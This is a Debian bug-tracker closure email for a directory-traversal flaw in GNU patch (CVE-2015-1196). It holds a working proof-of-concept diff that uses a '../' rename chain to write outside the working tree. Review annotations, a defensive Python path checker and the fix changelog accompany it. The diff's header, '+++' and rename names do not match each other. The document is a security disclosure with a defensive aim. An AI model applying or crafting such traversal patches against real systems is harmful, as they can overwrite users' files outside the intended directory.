Your message dated Sat, 24 Jan 2015 17:18:23 +0000
with message-id <e1yf4ln-00031n...@franck.debian.org>
and subject line Bug#775873: fixed in patch 2.7.3-1
has caused the Debian Bug report #775873,
regarding patch: directory traversal via file rename
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
775873: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=775873
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: patch
Version: 2.7.1-7
Tags: security
patch now supports git-style patches, which allow renaming files. This
feature can be abused for directory traversal. As a proof of concept,
applying the attached patch creates a file in /tmp:
$ ls /tmp/moo
/bin/ls: cannot access /tmp/moo: No such file or directory
$ mkdir empty && cd empty
$ patch -p1 < ~/traversal2.diff
patching file moo
patching file ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/moo (renamed from moo)
$ ls /tmp/moo
/tmp/moo
-- System Information:
Debian Release: 8.0
APT prefers unstable
APT policy: (990, 'unstable'), (500, 'experimental')
Architecture: i386 (x86_64)
Foreign Architectures: amd64
Kernel: Linux 3.2.0-4-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)
Versions of packages patch depends on:
ii libc6 2.19-13
--
Jakub Wilk
diff --git a/moo b/moo
new file mode 100644
--- /dev/null
+++ b/tmp/moo
@@ -0,0 +1 @@
+moo
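Review bot: the `diff --git` header names `b/moo` while the `+++` line names `b/tmp/moo`, and the transcript above ("patching file moo") shows the tool followed the header, so any path check has to be applied to the name the tool actually writes to, not only to the `---`/`+++` names.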
diff --git a/moo a/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/moo
rename from x
rename to x
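Review bot: the second name in this `diff --git` header is a chain of `../` components ending in `tmp/moo`, which resolves outside the working tree, and the `rename from x`/`rename to x` lines do not match the header names at all. A patch tool must resolve every output path it derives from a patch, rename targets included, and refuse any that lands above the current directory; the 2.7.3 changelog below records that fix as CVE-2015-1196.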
--- End Message ---
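A defender's pre-apply check for the problem class reported above, as an added example that is not part of the bug report, the Debian package or GNU patch's own code. The patch text is constructed, and the rules for which names in a git-style patch count as outputs and which get `-p` stripping are this example's own assumptions about how a patch tool names the files it writes.

```python
import posixpath
import re
import sys

# Constructed sample in the same shape as the report's proof of concept: one
# new file inside the tree, then a git-style rename whose target climbs out.
SAMPLE_PATCH = """\
diff --git a/moo b/moo
new file mode 100644
--- /dev/null
+++ b/moo
@@ -0,0 +1 @@
+moo
diff --git a/moo b/../../../../tmp/moo
rename from moo
rename to ../../../../tmp/moo
"""

GIT_HEADER = re.compile(r"^diff --git (\S+) (\S+)$")
RENAME_TO = re.compile(r"^rename to (\S+)$")
PLUS_FILE = re.compile(r"^\+\+\+ (\S+)")


def strip_components(path, strip):
    """Drop the first `strip` slash-separated components, like patch -pN."""
    return "/".join(path.split("/")[strip:])


def escapes_tree(path):
    """True if a path is absolute or, once normalised, climbs above the
    working directory. Normalising first is what catches 'a/../../x'."""
    if path.startswith("/"):
        return True
    norm = posixpath.normpath(path)
    return norm == ".." or norm.startswith("../")


def output_paths(patch_text, strip=1):
    """Collect every path the patch names as an output: the second name of each
    `diff --git` header, every `+++` file and every rename target.
    Assumption of this example: header and +++ names get -p stripping, while
    rename lines, which carry no a/ b/ prefix, are taken as written."""
    paths = []
    for line in patch_text.splitlines():
        m = GIT_HEADER.match(line)
        if m:
            paths.append(strip_components(m.group(2), strip))
            continue
        m = RENAME_TO.match(line)
        if m:
            paths.append(m.group(1))
            continue
        m = PLUS_FILE.match(line)
        if m and m.group(1) != "/dev/null":
            paths.append(strip_components(m.group(1), strip))
    return paths


def unsafe_targets(patch_text, strip=1):
    """Return the output paths that would land outside the working tree."""
    return [p for p in output_paths(patch_text, strip) if escapes_tree(p)]


if __name__ == "__main__":
    # Usage: python check_patch.py [file.diff]; without a file the sample runs.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PATCH
    bad = unsafe_targets(text)
    for p in bad:
        print("refusing: patch writes outside the tree:", p)
    sys.exit(1 if bad else 0)
```

The check deliberately looks at every name a patch can supply rather than the one the applier happens to use, since the report shows the header and `+++` names disagreeing. A production version would also track hunk line counts so that an added content line beginning with `++ ` is not mistaken for a `+++` file header.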
--- Begin Message ---
Source: patch
Source-Version: 2.7.3-1
We believe that the bug you reported is fixed in the latest version of
patch, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 775...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Laszlo Boszormenyi (GCS) <g...@debian.org> (supplier of updated patch package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Fri, 23 Jan 2015 20:27:32 +0000
Source: patch
Binary: patch
Architecture: source amd64
Version: 2.7.3-1
Distribution: unstable
Urgency: high
Maintainer: Laszlo Boszormenyi (GCS) <g...@debian.org>
Changed-By: Laszlo Boszormenyi (GCS) <g...@debian.org>
Description:
patch - Apply a diff file to an original
Closes: 775873 775901
Changes:
patch (2.7.3-1) unstable; urgency=high
.
* New upstream release with security fixes:
- fix all cases of CVE-2015-1196 (closes: #775873, #775901),
- fix infinite loop while applying patch, CVE-2014-9637.
* Remove outdated disable-update-version and add_manpage_time.patch
Debian patches.
* Add homepage field.
* Add watch file.
Checksums-Sha1:
4f268078a1fbca817718bdbdc55800dc248010c2 1795 patch_2.7.3-1.dsc
4191a36e4733935912280650b32644d9c786dfa1 684764 patch_2.7.3.orig.tar.xz
f55e05a44ce413bad4ec4024b1535642a32bb49e 8008 patch_2.7.3-1.debian.tar.xz
ea9a4bac964c7597778c622a8180ead0dd14c8a3 100886 patch_2.7.3-1_amd64.deb
Checksums-Sha256:
1995faba243dd94983feaed23d5426cbdafdeea062716d6e16d3f2293c8cecb3 1795 patch_2.7.3-1.dsc
d09022de9d629561bf4dad44625ef4b1ead15178b210412113531730cdb6f19d 684764 patch_2.7.3.orig.tar.xz
ec7b8b549a0ae8a00edd4655715100e22d85c3f3babc7c83ee0008cc23093632 8008 patch_2.7.3-1.debian.tar.xz
3af466c57953e6a653d703e3f665d8e02f2a4ef862c70f8cac2033aed4dc7096 100886 patch_2.7.3-1_amd64.deb
Files:
4911f5407afb72e201faa3ec9a8191f8 1795 vcs standard patch_2.7.3-1.dsc
29b87be845e4662ab0ca0d48a805ecc6 684764 vcs standard patch_2.7.3.orig.tar.xz
ce27aa99309c2c801fd6f9bcc951aa2c 8008 vcs standard patch_2.7.3-1.debian.tar.xz
c6ce0a0e9a7793382f674a640cac50e7 100886 vcs standard patch_2.7.3-1_amd64.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
-----END PGP SIGNATURE-----
--- End Message ---